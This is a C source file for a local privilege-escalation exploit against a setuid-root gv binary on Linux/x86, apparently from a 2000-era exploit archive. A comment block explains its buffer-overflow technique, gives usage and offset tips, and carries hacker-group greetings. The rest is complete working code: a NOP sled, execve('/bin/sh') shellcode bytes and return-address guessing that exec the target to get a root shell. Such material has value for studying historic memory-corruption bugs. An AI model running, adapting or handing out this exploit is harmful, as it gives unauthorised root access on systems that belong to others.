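/*
 * linux (/usr/X11R6/bin/gv) local root exploit
 * by slash / buffer0verfl0w security
 *
 * In order for this to work gv (/usr/X11R6/bin/gv) has to be suid and
 * owned by uid 0 (i.e. installed setuid root).  The payload is a 276-byte
 * command-line argument: a NOP sled, aleph1's Linux/x86 execve("/bin/sh")
 * shellcode ending at byte 250, and the rest filled with a guessed return
 * address derived from our own %esp.  It therefore only makes sense on
 * i386 with an executable, non-randomised stack (presumably how the
 * original 2000-era target looked; not verified here).
 *
 * Please don't bitch about the code, I know it's messy, but this is one of
 * my first attempts of writing an exploit :)  Exploit idea gotten from v9.
 * Thanx doud!  The important difference between his exploit and this one
 * is that mine works :)  Also thanx to JimJones for making this possible
 * for me by giving me free lectures on buffer overflows :)
 *
 * Compile this the old fashion way :)  To run this thing simply type:
 *      bash# ./linux-gv [offset]
 * Note that the default offset (2000) will be used if no offset was
 * provided.  Offset 2000 worked for me.  Try offsets between 1900 and 2300.
 *
 * Shoutouts go to: b0f, zsh, mdma, ADM, #phreak.nl, alan@packetstorm,
 * lcamtuf, Lam3rZ, TESO, HWA, funkySh and all the people who know me.
 * Special propz go to Mixter for his help.
 * Dislikes go to: h0lmez (looking forward to seeing your implementation of
 * the kernel 2.2.14 bug), p4riah (your lameness is nothing compared to
 * your ego).
 *
 * Peace out,
 *   -- slash - tcsh@b0f.i-p.com - buffer0verfl0w security
 */
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOPS    0x90                 /* i386 NOP: the sled slides into the shellcode */
#define LEN     276                  /* size of the overflowing argument, in bytes */
#define SC_END  250                  /* shellcode ends here; return addresses follow */
#define GV      "/usr/X11R6/bin/gv"  /* path to the target program */
#define OFFSET  2000                 /* default distance below our %esp */

/* aleph1's classic Linux/x86 execve("/bin/sh") shellcode (no NUL bytes). */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Return the current stack pointer (i386 only).
 *
 * The original version fell off the end of a non-void function and relied
 * on %eax still holding the value -- undefined behaviour that -O2 is free
 * to break.  Use a proper output operand instead.
 */
long esp(void)
{
    long sp;

    __asm__ volatile ("movl %%esp, %%eax" : "=a" (sp));
    return sp;
}

/*
 * Build the overflow argument and exec gv with it.
 *
 * argv[1] (optional): decimal offset subtracted from our %esp to guess the
 * return address; defaults to OFFSET.  Returns 1 on bad input or if the
 * exec fails; on success execl() does not return.
 */
int main(int argc, char **argv)
{
    /* +1 so the argv string has a terminator: execl() copies it with
     * strlen(), and the payload itself contains no NUL byte. */
    char buffer[LEN + 1];
    size_t sc_len = sizeof shellcode - 1;   /* exclude the trailing NUL */
    size_t i;
    int offset = OFFSET;
    long retaddr;
    uint32_t ret32;

    printf("Linux (GV) local root exploit\n");
    printf("coded by slash / buffer0verfl0w security\n");
    printf(" - \n");

    if (argc > 1) {
        /* strtol instead of atoi: reject garbage and out-of-range values
         * instead of silently using offset 0. */
        char *end;
        long v;

        errno = 0;
        v = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE ||
            v < INT_MIN || v > INT_MAX) {
            fprintf(stderr, "bad offset '%s'\n", argv[1]);
            return 1;
        }
        offset = (int) v;
    }

    /* Guard the size_t arithmetic below: a shellcode longer than SC_END
     * would make (SC_END - sc_len) wrap to a huge memset length. */
    if (sc_len > SC_END) {
        fprintf(stderr, "shellcode (%zu bytes) does not fit before byte %d\n",
                sc_len, SC_END);
        return 1;
    }

    /* Setting up the ret address */
    retaddr = esp() - offset;
    ret32 = (uint32_t) retaddr;        /* the target is 32-bit: write 4-byte words */
    printf("Using offset: %d.\n", offset);
    printf("Using return address: 0x%lx.\n", (unsigned long) retaddr);

    /* A zero byte inside the address would terminate the argv string early
     * and truncate the payload; refuse rather than exec a broken buffer. */
    if (memchr(&ret32, 0, sizeof ret32) != NULL) {
        fprintf(stderr, "return address contains a NUL byte; try another offset\n");
        return 1;
    }

    /* Fill the whole buffer with the return address, 4 bytes at a time.
     * memcpy avoids the misaligned/aliasing *(long *) store of the original,
     * which also overran the buffer by 4 bytes wherever long is 64 bits. */
    for (i = 0; i + sizeof ret32 <= LEN; i += sizeof ret32)
        memcpy(buffer + i, &ret32, sizeof ret32);

    /* NOP sled up to the shellcode, shellcode ending exactly at SC_END;
     * bytes SC_END..LEN-1 keep the return-address fill. */
    memset(buffer, NOPS, SC_END - sc_len);
    memcpy(buffer + (SC_END - sc_len), shellcode, sc_len);
    buffer[LEN] = '\0';

    /* exec the program; the sentinel must be a null pointer, not int 0,
     * or the variadic call is undefined on LP64. */
    execl(GV, "gv", "-ad", "-disp", ":0", buffer, (char *) NULL);
    perror("execl " GV);
    return 1;
}

/* www.hack.co.za [6 September 2000] */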